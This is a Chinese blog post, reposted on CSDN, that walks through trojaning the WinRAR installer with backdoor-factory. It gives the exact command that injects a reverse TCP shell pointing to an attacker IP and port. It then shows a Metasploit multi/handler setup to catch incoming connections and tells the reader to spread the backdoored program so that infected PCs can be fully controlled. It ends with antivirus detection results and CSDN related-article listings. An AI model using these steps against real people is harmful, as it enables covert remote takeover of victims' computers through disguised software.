后门

最新推荐文章于 2024-08-29 14:47:26 发布
最新推荐文章于 2024-08-29 14:47:26 发布
阅读量146 收藏
点赞数
文章标签: python git shell
原文链接:http://www.cnblogs.com/maskerk/p/10208111.html
版权

我们的网络不安全
https://www.youtube.com/watch?v=nJF9OTscFiQ

这次我们用到的程序叫backdoor-factory,为完整的程序注入后门程序。具体的请网上查看。

在kali linux系统上集成了该程序,但是注入后的程序显示为空文件(大小为0).故在ubuntu上手动安装尝试了一下,看我们的网络是否够安全。

注入

1.下载程序

git clone https://github.com/secretsquirrel/the-backdoor-factory.git

2.安装

sudo chmod +x ./install.sh

3.运行

sudo ./backdoor.py

iLOchco.jpg

4.选择目标文件

本次使用的软件为 https://rarlab.com/rar/winrar-x64-561.exe
之后将在此程序中注入后门

执行 ./babackdoor.py -f winrar-x64-561.exe -S
可以看到此程序支持代码注入
EsmxM2R.jpg
执行 ./babackdoor.py -f winrar-x64-561.exe -s show 查看支持哪几种注入方式
qotOrEs.jpg

5.开始注入

执行 ./backdoor.py -f ./winrar-x64-561.exe -s reverse_shell_tcp_inline -H 172.17.170.38 -P 1234

reverse_shell_tcp_inline 注入方式
172.17.170.38 攻击者ip,之后受害者主机来访问该ip
1234 攻击者端口,之后受害者主机来访问该端口

选择注入的位置:

qNuKCOi.jpg
都可以,这里我们选择2
oVJHdB8.jpg
完成。可以在指定目录下找到该文件。
到这里就注入完成了。

控制

服务器等待中招的pc连接。
设置服务器。打开kali linux系统。

#msfconsole
msf> use multi/handler
msf exploit(handler)> set PAYLOAD windows/shell/reverse_tcp
msf exploit(handler) > set LPORT 1234
msf exploit(handler) > set LHOST 172.17.170.38
msf exploit(handler) > exploit

将注入好的程序散发出去。如果有计算机不幸中招。
当有中招的pc代开注入后门的程序后,服务器端会有响应。
2UpwlH4.jpg
可以看到172.17.172.223连入服务器。这时候,你就可以全权控制223这台主机了。

可以看到被控制的主机信息。(编码格式可能不对,出现乱码)

9V7BGXl.jpg

测试

对于注入后门程序的程序,会不会成功被检测到呢。我用的火绒杀毒,双击之后立马报警。
s3WixcE.png
对于其他杀毒软件看看什么情况,可以看到能够查杀到此后门的杀毒软件并不多。
Iczy45H.png
YwqX8Sw.png

实际上,该程序官网下载的源文件也可能会被误杀

xRKX4JZ.png
杀毒可以参考网站:
http://www.virscan.org/language/zh-cn/
https://www.virustotal.com/zh-cn/

参考

利用BDF向EXE文件植入后门

Backdoor factory – How to inject shell-code into windows application

Kali Linux 渗透测试 博客记录

转载于:https://www.cnblogs.com/maskerk/p/10208111.html

weixin_30588675
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全-渗透提权-查看数据库工具
Sumarua的博客
06-22 290
网络安全-渗透提权-查看数据库工具 文件已上传至☞:https://download.csdn.net/download/weixin_43510203/12543339
20144306免考_如何在可执行文件中手动植入后门
weixin_30482383的博客
06-01 415
原文:https://www.exploit-db.com/docs/42061.pdf 免责声明:纯手工翻译,谢谢,本文仅限教学,偷鸡摸狗的后果自负。 免考1 课程总结 word文档+xmind脑图 免考2 如何在可执行文件中手动植入后门 前言 本文介绍了如何木马化正常的可执行文件,选择了一种管理员常用到的系统文件作为植入后门的对象,通过反汇编,对可执行...
linux后门教程
2301_82000839的博客
07-16 1475
aliasunalias ls**加参数:**alias ls=‘ls -laih;pwd’
Metasploit 生成各种后门
热门推荐
CSDN
01-13 1万+
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境中的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.
后门学习记录
aaaxinxin_的博客
01-22 3836
后门学习记录Webshell释义:Webshell来源:Webshell详述:Shell(计算机壳层)Linux的shell分类:WebshellWebshell分类小马/一句话木马大马上传Webshell的方法归类(1)解析漏洞上传1. iis目录解析漏洞2. 文本解析漏洞3. 文件名解析4. fast-CGI解析漏洞5. apache解析漏洞(2)截断上传(3)后台数据库备份(4)利用数据库语句上传1. mysql数据库into outfield2. 建立新表写入木马3. phpMyadmin 设置错误
最新-屏蔽金蝶联网后门验证_金蝶_最新-屏蔽金蝶联网后门验证_
10-02
联网后门验证通常指的是黑客利用软件中的漏洞创建的后门,通过这些后门,他们可以绕过正常的安全检查,远程控制或窃取系统数据。在金蝶系统中,这样的后门可能会对企业的财务数据安全构成严重威胁。因此,"最新-屏蔽...
Linux下查找后门程序 CentOS 查后门程序的shell脚本
01-20
一般后门程序,在ps等进程查看工具里找不到,因为这些常用工具甚至系统库在系统被入侵之后基本上已经被动过手脚(网上流传着大量的rootkit。假如是内核级的木马,那么该方法就无效了)。 因为修改系统内核相对复杂...
快速开发NFine框架(去后门版本)
01-30
这个"快速开发NFine框架(去后门版本)"是经过优化,去除了潜在的安全隐患,为开发者提供了一个更加安全可靠的开发环境。它强调的是提高开发效率,减少业务代码的编写工作量,使程序员能够更专注于业务逻辑的实现,而...
centos7 安装 superset4.0.2 教程
m0_37759590的博客
08-27 5202
centos7 安装 superset4.0.2 教程
python12 中,No module named‘distutils‘错误
qq_43557600的博客
08-27 5142
python12 “ No module named'distutils' ”,​ 安装 pip install setuptools ,解决 ​
python计算机视觉编程——1.基本的图像操作和处理】
m0_53694086的博客
08-26 7544
参数sigma为标准差(σ),是高斯滤波器的一个重要参数,它控制滤波器的平滑程度。标准差越大,高斯函数的曲线越宽,滤波器的影响范围就越大。标准差较大: 高斯滤波器会在更大范围内进行平滑,使得图像变得更加模糊,细节和边缘特征会被更强地平滑掉。标准差较小: 高斯滤波器会产生较小范围的平滑效果,图像的细节保留更多。还可以给定转换矩阵,将RGB图像转换为CIE XYZ色彩空间。图像像素值被分成128个区间,用于计算每个区间的像素值频率。可以返回目录中所有jpg图像的列表。
python】关于判断空值None、判断len()=0,和 if not 的区别
Meggie35的博客
08-28 1695
python的“空”与“无”之辩,关于None,和空数值。在程序中,判断里面没有值和判断东西是不是为空,也是不一样的东西,我们可以往下看看具体的区别。
均值漂移算法原理及Python实践
u013571432的博客
08-25 2070
均值漂移算法(Mean Shift Algorithm)是一种基于密度的非参数聚类算法,其原理主要基于核密度估计和梯度上升方法。
odoo SyntaxWarning: invalid escape sequence ‘\w‘
fqfq123456的专栏
08-25 1159
‌如果你在处理正则表达式,‌通常使用原始字符串更为方便,‌因为正则表达式中经常使用反斜杠,‌而原始字符串可以避免很多转义相关的问题。函数(‌或任何类似的自定义警告处理函数)‌会在你的代码或你使用的库中遇到需要警告用户的情况时被调用。‌:‌如果代码中存在可能导致错误或意外行为的潜在问题,‌开发者可能会使用警告来提醒用户注意。‌:‌在处理可能涉及安全风险的操作时,‌软件可能会使用警告来提醒用户注意潜在的安全问题。‌:‌当代码使用了即将被弃用或已经弃用的功能时,‌库可能会调用警告函数来通知用户。
Python-办公自动化】批量修改EXCEL指定内容
2202_76035290的博客
08-29 421
欢迎来到"花花 Show Python",一名热爱编程和分享知识的技术博主。在这里,我将与您一同探索Python的奥秘,分享编程技巧、项目实践和学习心得。无论您是编程新手还是资深开发者,都能在这里找到有价值的信息和灵感。我热衷于将复杂的技术概念以简单易懂的方式呈现给大家,让每个人都能享受到编程的乐趣。我相信,通过不断的学习和实践,我们都能够成为更好的开发者。如果您喜欢我的内容,别忘了点击关注哦!这样您就可以第一时间获取我的更新和分享。您的支持是我不断前进的动力。
人工智能开发实战机器学习算法解析
最新发布
sinat_30844883的博客
08-29 700
机器学习算法是人工智能领域的重要组成部分,它们通过从数据中学习并自动改进,而无需进行显式的编程。机器学习算法可以分为多种类型,包括监督学习、无监督学习、半监督学习、迁移学习和强化学习。每种类型都有其特定的应用场景和优势。
【Rust练习】10.元组
矢车菊二十七号
08-25 523
练习题来自:https://practice-zh.course.rs/compound-types/tuple.html。
宝塔面板网站SSL证书到期如何手动和自动续签Let’s Encrypt
weixin_45734165的博客
08-27 468
宝塔面板提供2种免费的SSL证书:宝塔SSL,Let’s Encrypt。前面第1,2步骤主要是手动续签,比较稳定可靠,唯一的缺点是需要进入后台进行操作,并且有时候可能忘记续签。实际上宝塔面板还提供了很多计划任务的脚本,可以自动续签Let’s Encrypt证书。不管是给网站部署SSL还是给网站SSL续签,利用宝塔后台来进行网站SSL证书的管理还是比较方便高效的。2.手动续签:网站设置后台点击【SSL】》【Let’s Encrypt】》【续签】1.手动续签:登录宝塔面板后台,点击【网站】》【设置】
buuctfwebshell后门
07-27
回答: 根据提供的引用内容,buuctfwebshell后门可能是一个存在于buuctf网站中的后门。具体的操作和细节需要进一步的信息才能确定。引用\[1\]中提到了一个HTTP请求,其中包含了一个名为admina的参数和一个名为adminb...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值